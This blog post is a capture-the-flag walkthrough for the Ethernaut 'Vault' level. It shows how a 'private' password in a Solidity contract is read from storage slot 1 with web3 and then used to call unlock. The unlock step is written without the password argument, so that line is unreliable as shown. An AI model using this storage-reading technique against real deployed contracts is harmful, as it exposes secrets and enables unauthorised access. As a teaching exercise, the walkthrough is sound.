DEV Community

Cover image for Ethernaut Hacks Level 8: Vault
Naveen ⚡
Naveen ⚡

Posted on

1 1

Ethernaut Hacks Level 8: Vault

This is the level 8 of Ethernaut game.

Pre-requisites

Hack

Given contract:

// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;

contract Vault {
  bool public locked;
  bytes32 private password;

  constructor(bytes32 _password) public {
    locked = true;
    password = _password;
  }

  function unlock(bytes32 _password) public {
    if (password == _password) {
      locked = false;
    }
  }
}
Enter fullscreen mode Exit fullscreen mode

player has to set locked to false.

Only way is by calling unlock by correct password.

Although password state variable is private, one can still read a storage variable by determining it's storage slot. Therefore sensitive information should not be stored on-chain, even if it is specified private.

Above, the password is at a storage slot of 1 in Vault.

Let's read it:

password = await web3.eth.getStorageAt(contract.address, 1)
Enter fullscreen mode Exit fullscreen mode

Call unlock with password:

await contract.unlock()
Enter fullscreen mode Exit fullscreen mode

Unlocked. Verify by:

await contract.locked() === false
Enter fullscreen mode Exit fullscreen mode

And that's it.

Learned something awesome? Consider starring the github repo 😄

and following me on twitter here 🙏

Billboard image

The Next Generation Developer Platform

Coherence is the first Platform-as-a-Service you can control. Unlike "black-box" platforms that are opinionated about the infra you can deploy, Coherence is powered by CNC, the open-source IaC framework, which offers limitless customization.

Learn more

Top comments (0)

A Workflow Copilot. Tailored to You.

Pieces.app image

Our desktop app, with its intelligent copilot, streamlines coding by generating snippets, extracting code from screenshots, and accelerating problem-solving.

Read the docs